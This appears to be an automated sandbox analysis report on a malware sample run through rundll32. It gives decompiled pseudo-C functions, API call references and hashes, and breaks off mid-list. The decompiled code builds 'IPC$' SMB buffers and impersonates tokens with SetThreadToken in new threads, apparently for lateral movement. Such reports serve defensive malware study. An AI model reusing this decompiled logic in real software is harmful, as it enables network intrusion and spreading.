                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B52FD,?,?,?,?,?,?,?,00000000,00000000,?,?), ref: 007B515F
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$Alloc
                                                                                                                                                                                        • String ID: Oet Uet0Xet$07|
                                                                                                                                                                                        • API String ID: 3689955550-2676941948
                                                                                                                                                                                        • Opcode ID: 7d4e213bce4ee5437a27a0adbdc30ba050315891a49b8401b828224760754d66
                                                                                                                                                                                        • Instruction ID: f609876bafabcd8b218c9f4f6042b8cd61ffc5992014e8f958712cc06696f7b2
                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d4e213bce4ee5437a27a0adbdc30ba050315891a49b8401b828224760754d66
                                                                                                                                                                                        • Instruction Fuzzy Hash: 2A21CF7254024DBBEF228F94DC49FEB3B6CEF44315F048055FE44AA191D6B99E19CBA0
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B4E60(intOrPtr _a4, void* _a8, short _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                        				signed int _v16;
                                                                                                                                                                                        				void* _t27;
                                                                                                                                                                                        				short _t29;
                                                                                                                                                                                        				signed char* _t31;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        				signed char _t45;
                                                                                                                                                                                        				signed int* _t51;
                                                                                                                                                                                        				void* _t53;
                                                                                                                                                                                        				intOrPtr _t54;
                                                                                                                                                                                        				void* _t57;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t27 = HeapAlloc(GetProcessHeap(), 8, 0x48);
                                                                                                                                                                                        				_t57 = _t27;
                                                                                                                                                                                        				if(_t57 == 0) {
                                                                                                                                                                                        					L11:
                                                                                                                                                                                        					return _v5;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				_t53 = 0x10;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					 *_t27 =  !( *(0x7c3730 + _t27));
                                                                                                                                                                                        					_t27 = _t27 + 1;
                                                                                                                                                                                        					_t53 = _t53 - 1;
                                                                                                                                                                                        				} while (_t53 != 0);
                                                                                                                                                                                        				_t29 = 0x48;
                                                                                                                                                                                        				 *((short*)(_t57 + 8)) = _t29;
                                                                                                                                                                                        				 *((short*)(_t57 + 0x10)) = 0x10b8;
                                                                                                                                                                                        				 *((short*)(_t57 + 0x12)) = 0x10b8;
                                                                                                                                                                                        				 *((char*)(_t57 + 2)) = 0xb;
                                                                                                                                                                                        				_t51 = 0x7c3700;
                                                                                                                                                                                        				_t7 = _t57 + 0x18; // 0x18
                                                                                                                                                                                        				_t31 = _t7;
                                                                                                                                                                                        				_t54 = 0x30;
                                                                                                                                                                                        				do {
                                                                                                                                                                                        					_t45 =  !( *_t51);
                                                                                                                                                                                        					_t51 =  &(_t51[0]);
                                                                                                                                                                                        					 *_t31 = _t45;
                                                                                                                                                                                        					_t31 =  &(_t31[1]);
                                                                                                                                                                                        					_t54 = _t54 - 1;
                                                                                                                                                                                        				} while (_t54 != 0);
                                                                                                                                                                                        				if(E007B2F5A(_a4, _a8, _a12, _t54, 0xff, 8, _t57, 0x48) != 0) {
                                                                                                                                                                                        					_v16 = _v16 & 0x00000000;
                                                                                                                                                                                        					_v12 = _v12 & 0x00000000;
                                                                                                                                                                                        					if(E007B3071(_t51, _a4, _a8, _a12,  &_v12,  &_v16) != 0) {
                                                                                                                                                                                        						_t38 = _v12;
                                                                                                                                                                                        						if(0 ==  *((intOrPtr*)(_t38 + _v16 - 0x18))) {
                                                                                                                                                                                        							_v5 = 1;
                                                                                                                                                                                        						}
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 8, _t38);
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				HeapFree(GetProcessHeap(), 8, _t57);
                                                                                                                                                                                        				goto L11;
                                                                                                                                                                                        			}
















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000048,?,?,00000000,IPC$,?,00000000,00000000), ref: 007B4E76
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000), ref: 007B4E79
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000000,00000000,0000002F,00000000,00000000,00000008,000000FF,0000002F,0000002F), ref: 007B4F2A
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4F2D
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000000,00000008,000000FF,0000002F,0000002F,000000FF,00000008,00000000,00000048,00000000), ref: 007B4F32
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000), ref: 007B4F35
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Process$Free$Alloc
                                                                                                                                                                                        • String ID: 07|
                                                                                                                                                                                        • API String ID: 3689955550-312385953
                                                                                                                                                                                        • Opcode ID: 00c15ab0b8cab0af0dd630a4eb44e2e924f0a6dd641f02f79c96e19731c68a71
                                                                                                                                                                                        • Instruction ID: 04799d0063f158a09ed4bd294640c43cf8377e12b660d7fa7de2dcfd3958d75f
                                                                                                                                                                                        • Opcode Fuzzy Hash: 00c15ab0b8cab0af0dd630a4eb44e2e924f0a6dd641f02f79c96e19731c68a71
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F210431684248BEEF219B648C05FEF7F78EF65715F048059F5899B292DA788909C760
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                        			E007B317C(void* __ecx, intOrPtr _a4, intOrPtr* _a8, short _a12) {
                                                                                                                                                                                        				char _v5;
                                                                                                                                                                                        				void* _v12;
                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                        				signed int _t22;
                                                                                                                                                                                        				int _t24;
                                                                                                                                                                                        				signed int _t33;
                                                                                                                                                                                        				void* _t38;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v5 = 0;
                                                                                                                                                                                        				_t19 = HeapAlloc(GetProcessHeap(), 8, 0x200);
                                                                                                                                                                                        				_v12 = _t19;
                                                                                                                                                                                        				if(_t19 != 0) {
                                                                                                                                                                                        					_t37 =  *_a8;
                                                                                                                                                                                        					_t22 = rand();
                                                                                                                                                                                        					asm("cdq");
                                                                                                                                                                                        					_t33 = 0x14;
                                                                                                                                                                                        					 *((intOrPtr*)(_t37 + 0x22)) =  *((intOrPtr*)( *_a8 + 0x22)) + _t22 % _t33;
                                                                                                                                                                                        					_t38 = 0;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t24 = rand();
                                                                                                                                                                                        						_t34 = _v12;
                                                                                                                                                                                        						 *(_t38 + _v12) = _t24;
                                                                                                                                                                                        						_t38 = _t38 + 1;
                                                                                                                                                                                        					} while (_t38 < 0x200);
                                                                                                                                                                                        					if(E007B2F5A(_a4,  *_a8, _a12, 0, 0xff, 4, _t34, 0x200) != 0) {
                                                                                                                                                                                        						_v5 = 1;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					HeapFree(GetProcessHeap(), 8, _v12);
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _v5;
                                                                                                                                                                                        			}











                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,00000200,?,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?), ref: 007B318E
                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007B3195
                                                                                                                                                                                        • rand.MSVCRT ref: 007B31AF
                                                                                                                                                                                        • rand.MSVCRT ref: 007B31BD
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,000000FF,00000004,?,00000200,?,?,?,007B47E5,?,?,00000000,?), ref: 007B31F4
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,?,007B47E5,?,?,00000000,?,?,?,?,?,?,?,?), ref: 007B31FB
                                                                                                                                                                                        Strings
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Processrand$AllocFree
                                                                                                                                                                                        • String ID: Oet Uet0Xet
                                                                                                                                                                                        • API String ID: 1335519115-3175316637
                                                                                                                                                                                        • Opcode ID: d459bd295477d18865678aa0cae30cb41b1daf30b5c59e9a223aec5b9614f106
                                                                                                                                                                                        • Instruction ID: 7b07e3f971efacbf248fd61f7b1a8e6e2cc72d5acbd7979fc76bd11fb9f2247a
                                                                                                                                                                                        • Opcode Fuzzy Hash: d459bd295477d18865678aa0cae30cb41b1daf30b5c59e9a223aec5b9614f106
                                                                                                                                                                                        • Instruction Fuzzy Hash: FE110832100309BBDB119B98CC49FDE7F79FF45310F004068F6049B191DBB99949C764
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 86%
                                                                                                                                                                                        			E007B6BD1(void* __ecx, void* __esi) {
                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                        				void* _t23;
                                                                                                                                                                                        				intOrPtr* _t30;
                                                                                                                                                                                        				intOrPtr* _t32;
                                                                                                                                                                                        				intOrPtr* _t47;
                                                                                                                                                                                        				void* _t52;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t52 = __esi;
                                                                                                                                                                                        				if(__esi != 0) {
                                                                                                                                                                                        					if( *((intOrPtr*)(__esi + 0x18)) == 0) {
                                                                                                                                                                                        						L11:
                                                                                                                                                                                        						return HeapFree(GetProcessHeap(), 0, _t52);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v8 = _v8 & 0x00000000;
                                                                                                                                                                                        					if( *((intOrPtr*)(__esi + 0x24)) == 0) {
                                                                                                                                                                                        						L10:
                                                                                                                                                                                        						HeapFree(GetProcessHeap(), 0,  *(_t52 + 0x18));
                                                                                                                                                                                        						goto L11;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						goto L3;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						L3:
                                                                                                                                                                                        						_t30 =  *(_t52 + 0x18) + _v8 * 4;
                                                                                                                                                                                        						if( *_t30 != 0) {
                                                                                                                                                                                        							_t32 =  *_t30;
                                                                                                                                                                                        							if( *_t32 != 0) {
                                                                                                                                                                                        								_t47 =  *((intOrPtr*)(_t52 + 0x30));
                                                                                                                                                                                        								if(_t47 != 0) {
                                                                                                                                                                                        									 *_t47( *_t32);
                                                                                                                                                                                        								}
                                                                                                                                                                                        								HeapFree(GetProcessHeap(), 0,  *( *( *(_t52 + 0x18) + _v8 * 4)));
                                                                                                                                                                                        							}
                                                                                                                                                                                        							HeapFree(GetProcessHeap(), 0,  *( *(_t52 + 0x18) + _v8 * 4));
                                                                                                                                                                                        						}
                                                                                                                                                                                        						_v8 = _v8 + 1;
                                                                                                                                                                                        					} while (_v8 <  *((intOrPtr*)(_t52 + 0x24)));
                                                                                                                                                                                        					goto L10;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				return _t23;
                                                                                                                                                                                        			}










                                                                                                                                                                                        APIs
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C29
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C2C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C39
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C3C
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,?,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C4E
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C51
                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000000,00000000,74654F20,77D74620,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C56
                                                                                                                                                                                        • HeapFree.KERNEL32(00000000,?,?,007B6CBD,?,?,00000000,?,007B7A55,00000024,007B6AA8,00000000,0000FFFF), ref: 007B6C59
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$FreeProcess
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 3859560861-0
                                                                                                                                                                                        • Opcode ID: c80cedfc482428cad67062f01be2bfc69a307c3f429796ee257b703f888b4a65
                                                                                                                                                                                        • Instruction ID: 1cf6c1492540186963c4fde8fde3afce73372d98db015b74127c7335325f2166
                                                                                                                                                                                        • Opcode Fuzzy Hash: c80cedfc482428cad67062f01be2bfc69a307c3f429796ee257b703f888b4a65
                                                                                                                                                                                        • Instruction Fuzzy Hash: CB114631600308EFDB24EF96CD81FAAB7B9EF85345F010458E645972A1CB78FD44CA60
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007B652F(void* __ecx, signed int _a4) {
                                                                                                                                                                                        				int _v8;
                                                                                                                                                                                        				WCHAR** _v12;
                                                                                                                                                                                        				intOrPtr* _t20;
                                                                                                                                                                                        				int _t26;
                                                                                                                                                                                        				WCHAR** _t28;
                                                                                                                                                                                        				WCHAR* _t32;
                                                                                                                                                                                        				void* _t39;
                                                                                                                                                                                        				intOrPtr _t42;
                                                                                                                                                                                        				void* _t45;
                                                                                                                                                                                        				WCHAR* _t52;
                                                                                                                                                                                        				WCHAR* _t53;
                                                                                                                                                                                        
                                                                                                                                                                                        				if(_a4 == 0) {
                                                                                                                                                                                        					L20:
                                                                                                                                                                                        					if( *0x7c7bc4 == 0) {
                                                                                                                                                                                        						 *0x7c7bc4 = 0x2d;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					return 0;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					_t20 = _a4;
                                                                                                                                                                                        					_t45 = _t20 + 2;
                                                                                                                                                                                        					do {
                                                                                                                                                                                        						_t42 =  *_t20;
                                                                                                                                                                                        						_t20 = _t20 + 2;
                                                                                                                                                                                        					} while (_t42 != 0);
                                                                                                                                                                                        					if(_t20 == _t45) {
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_v8 = 0;
                                                                                                                                                                                        					_t39 = CommandLineToArgvW(_a4,  &_v8);
                                                                                                                                                                                        					if(_t39 == 0) {
                                                                                                                                                                                        						L19:
                                                                                                                                                                                        						goto L20;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_v8 <= 0) {
                                                                                                                                                                                        						L18:
                                                                                                                                                                                        						LocalFree(_t39);
                                                                                                                                                                                        						goto L19;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t26 = StrToIntW( *_t39);
                                                                                                                                                                                        					_t44 = 1;
                                                                                                                                                                                        					_a4 = 1;
                                                                                                                                                                                        					if(_t26 > 0) {
                                                                                                                                                                                        						 *0x7c7bc4 = _t26;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					if(_v8 > _t44) {
                                                                                                                                                                                        						do {
                                                                                                                                                                                        							_t28 = _t39 + _a4 * 4;
                                                                                                                                                                                        							_t52 =  *_t28;
                                                                                                                                                                                        							_v12 = _t28;
                                                                                                                                                                                        							if(_t52 != StrStrW(_t52, L"-h")) {
                                                                                                                                                                                        								_t53 =  *_v12;
                                                                                                                                                                                        								if(_t53 != StrStrW(_t53, L"-f")) {
                                                                                                                                                                                        									_t32 = StrChrW(_t53, 0x3a);
                                                                                                                                                                                        									if(_t32 != 0) {
                                                                                                                                                                                        										_t44 = 0;
                                                                                                                                                                                        										 *_t32 = 0;
                                                                                                                                                                                        										E007B69AE(_t53,  &(_t32[1]), 1);
                                                                                                                                                                                        									}
                                                                                                                                                                                        								} else {
                                                                                                                                                                                        									 *0x7c7b7c =  *0x7c7b7c & 0xfffffffd;
                                                                                                                                                                                        								}
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								E007B64A6(_t52, _t44);
                                                                                                                                                                                        							}
                                                                                                                                                                                        							_a4 =  &(_a4[0]);
                                                                                                                                                                                        						} while (_a4 < _v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					goto L18;
                                                                                                                                                                                        				}
                                                                                                                                                                                        			}















                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CommandLineToArgvW.SHELL32(?,?,00000000,?,?,?,?,007B7A8E,?), ref: 007B6566
                                                                                                                                                                                        • StrToIntW.SHLWAPI(00000000,?,?,?,?,007B7A8E,?), ref: 007B6581
                                                                                                                                                                                        • StrStrW.SHLWAPI(00000000,007C1580,?,?,?,?,?,007B7A8E,?), ref: 007B65B3
                                                                                                                                                                                        • StrStrW.SHLWAPI(00000000,007C1588,?,?,?,?,?,007B7A8E,?), ref: 007B65CD
                                                                                                                                                                                        • StrChrW.SHLWAPI(00000000,0000003A,?,?,?,?,?,007B7A8E,?), ref: 007B65DF
                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,?,?,?,?,007B7A8E,?), ref: 007B6607
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                        • Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        • Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: ArgvCommandFreeLineLocal
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 1203019955-0
                                                                                                                                                                                        • Opcode ID: 2f3d43a009bba879a224e5aa2cad289845dc2f2ea44c5339df235550766d4251
                                                                                                                                                                                        • Instruction ID: 6d46d2125e5e2ba16d2ad17e12ab99788d1c84ef7ce9940829098c5f83d8e8d0
                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f3d43a009bba879a224e5aa2cad289845dc2f2ea44c5339df235550766d4251
                                                                                                                                                                                        • Instruction Fuzzy Hash: 6931BD71500118EBCB21AF28D985FEEBBA8FF05755B008179E602DB250E77CEE60CB94
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 87%
                                                                                                                                                                                        			E007B98AB(void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void*** _v12;
                                                                                                                                                                                        				intOrPtr _v16;
                                                                                                                                                                                        				intOrPtr _v28;
                                                                                                                                                                                        				void _v32;
                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                        				intOrPtr _t22;
                                                                                                                                                                                        				void* _t29;
                                                                                                                                                                                        				struct _SECURITY_ATTRIBUTES* _t39;
                                                                                                                                                                                        				void _t41;
                                                                                                                                                                                        				void* _t44;
                                                                                                                                                                                        
                                                                                                                                                                                        				_t39 = 0;
                                                                                                                                                                                        				_t41 = 0;
                                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                                        				_t22 = E007B6CED(0,  &_v12);
                                                                                                                                                                                        				_v16 = _t22;
                                                                                                                                                                                        				if(_t22 == 0) {
                                                                                                                                                                                        					L12:
                                                                                                                                                                                        					return _t41;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                        					_t44 =  *( *_v12);
                                                                                                                                                                                        					_v32 = _t39;
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					asm("stosd");
                                                                                                                                                                                        					_v28 = _a4;
                                                                                                                                                                                        					_t29 = CreateThread(_t39, _t39, E007B988B,  &_v32, 4, _t39);
                                                                                                                                                                                        					_v8 = _t29;
                                                                                                                                                                                        					if(_t29 != _t39) {
                                                                                                                                                                                        						if(SetThreadToken( &_v8, _t44) != 0) {
                                                                                                                                                                                        							if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                                                        								GetLastError();
                                                                                                                                                                                        							} else {
                                                                                                                                                                                        								WaitForSingleObject(_v8, 0xffffffff);
                                                                                                                                                                                        							}
                                                                                                                                                                                        						}
                                                                                                                                                                                        						CloseHandle(_v8);
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t41 = _v32;
                                                                                                                                                                                        					if(_t41 != _t39 || E007B6D35(_v16, _a8,  &_v12) == 0) {
                                                                                                                                                                                        						break;
                                                                                                                                                                                        					}
                                                                                                                                                                                        					_t39 = 0;
                                                                                                                                                                                        				}
                                                                                                                                                                                        				E007B6B46(_v16);
                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                        			}
















                                                                                                                                                                                        APIs
                                                                                                                                                                                          • Part of subcall function 007B6CED: GetProcessHeap.KERNEL32(00000008,00000008,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFC
                                                                                                                                                                                          • Part of subcall function 007B6CED: HeapAlloc.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6CFF
                                                                                                                                                                                          • Part of subcall function 007B6CED: GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D24
                                                                                                                                                                                          • Part of subcall function 007B6CED: HeapFree.KERNEL32(00000000,?,?,007B6B24,00000000,00000000,?,?,?,007BA35C,?), ref: 007B6D27
                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 007B98FD
                                                                                                                                                                                        • SetThreadToken.ADVAPI32(?,?,?,007BA15C,?,?), ref: 007B990F
                                                                                                                                                                                        • ResumeThread.KERNEL32(?,?,007BA15C,?,?), ref: 007B991C
                                                                                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,007BA15C,?,?), ref: 007B992C
                                                                                                                                                                                        • GetLastError.KERNEL32(?,007BA15C,?,?), ref: 007B9934
                                                                                                                                                                                        • CloseHandle.KERNEL32(?,?,007BA15C,?,?), ref: 007B993D
                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                        • Source File: 00000003.00000002.335449220.00000000007B1000.00000020.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000003.00000002.335320372.00000000007B0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.335914772.00000000007BD000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336086446.00000000007C3000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000003.00000002.336118743.00000000007C9000.00000002.00001000.00020000.00000000.sdmp
                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_7b0000_rundll32.jbxd
                                                                                                                                                                                        Similarity
                                                                                                                                                                                        • API ID: Heap$Thread$Process$AllocCloseCreateErrorFreeHandleLastObjectResumeSingleTokenWait
                                                                                                                                                                                        • String ID:
                                                                                                                                                                                        • API String ID: 298440786-0
                                                                                                                                                                                        • Opcode ID: b12dc65210e3c2ee8524a018914336110ebef41863de4520270e9e604ca79c1f
                                                                                                                                                                                        • Instruction ID: 96a0685c91d78d18482443cc2bb59ea0ddf742d43ac236095b966625e3a728df
                                                                                                                                                                                        • Opcode Fuzzy Hash: b12dc65210e3c2ee8524a018914336110ebef41863de4520270e9e604ca79c1f
                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B211075A00109FFCF109FA8DC85ADEB779EF49314F114569E721E3160E738AE059B50
                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                        			E007BA3B1(void* __ecx, void* _a4) {
                                                                                                                                                                                        				void* _v8;
                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                        
                                                                                                                                                                                        				_v8 = 0;
                                                                                                                                                                                        				_t18 = 0;
                                                                                                                                                                                        				_t9 = CreateThread(0, 0, E007BA016, 0, 4, 0);
                                                                                                                                                                                        				_v8 = _t9;
                                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                                        					_t18 = 0x57;
                                                                                                                                                                                        				} else {
                                                                                                                                                                                        					if(SetThreadToken( &_v8, _a4) == 0) {
                                                                                                                                                                                        						_t18 = GetLastError();
                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                        					} else {
                                                                                                                                                                                        						if(ResumeThread(_v8) == 0xffffffff) {
                                                                                                                                                                                        							L5:
                                                                                                                                                                                        							CloseHandle(_v8);
                                                                                                                                                                                        							_v8 = 0;
                                                                                                                                                                                        						}
                                                                                                                                                                                        					}
                                                                                                                                                                                        				}
                                                                                                                                                                                        				SetLastError(_t18);
                                                                                                                                                                                        				return _v8;
                                                                                                                                                                                        			}







                                                                                                                                                                                        APIs
                                                                                                                                                                                        • CreateThread.KERNEL32 ref: 007BA3C9
                                                                                                                                                                                        • SetThreadToken.ADVAPI32(?,?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3DD
                                                                                                                                                                                        • ResumeThread.KERNEL32(?,?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3EA
                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,007B7B43,?,?,00000004,007B787C,00000000,000000FF), ref: 007BA3F7
